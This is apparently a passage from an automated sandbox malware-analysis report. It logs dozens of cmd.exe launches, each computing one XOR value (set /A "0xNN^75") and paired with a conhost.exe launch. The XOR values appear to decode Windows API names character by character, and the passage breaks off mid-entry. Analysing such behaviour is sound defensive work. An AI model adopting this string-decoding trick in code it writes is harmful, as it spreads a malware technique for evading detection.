                                  Start time:10:04:09
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x0E^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:4
                                  Start time:10:04:09
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:5
                                  Start time:10:04:09
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x19^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:6
                                  Start time:10:04:09
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:7
                                  Start time:10:04:09
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x05^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:8
                                  Start time:10:04:09
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:9
                                  Start time:10:04:09
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x0E^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:10
                                  Start time:10:04:09
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:11
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x07^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:12
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:13
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x78^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:14
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:15
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x79^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:16
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:17
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x71^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:18
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:19
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x71^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:20
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:21
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x08^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:22
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:23
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x39^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:24
                                  Start time:10:04:10
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:25
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x2E^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:26
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:27
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x2A^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:28
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:29
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x3F^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:30
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:31
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x2E^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:32
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:33
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x0D^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:34
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:35
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x22^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:36
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:37
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x27^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:38
                                  Start time:10:04:11
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:39
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x2E^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:40
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:41
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x0A^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:42
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:43
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x63^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:44
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:45
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x26^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:46
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:47
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:48
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:49
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x39^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:50
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:51
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7F^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:52
                                  Start time:10:04:12
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:53
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:54
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:55
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x67^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:56
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:57
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:58
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:59
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x22^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:60
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:61
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x6B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:62
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:63
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:64
                                  Start time:10:04:13
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:65
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x33^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:66
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:67
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x73^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:68
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:69
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
                                  Commandline:cmd.exe /c set /A "0x7B^75"
                                  Imagebase:
                                  File size:236544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:70
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:875008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:71
                                  Start time:10:04:14
                                  Start date:25/01/2023
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):
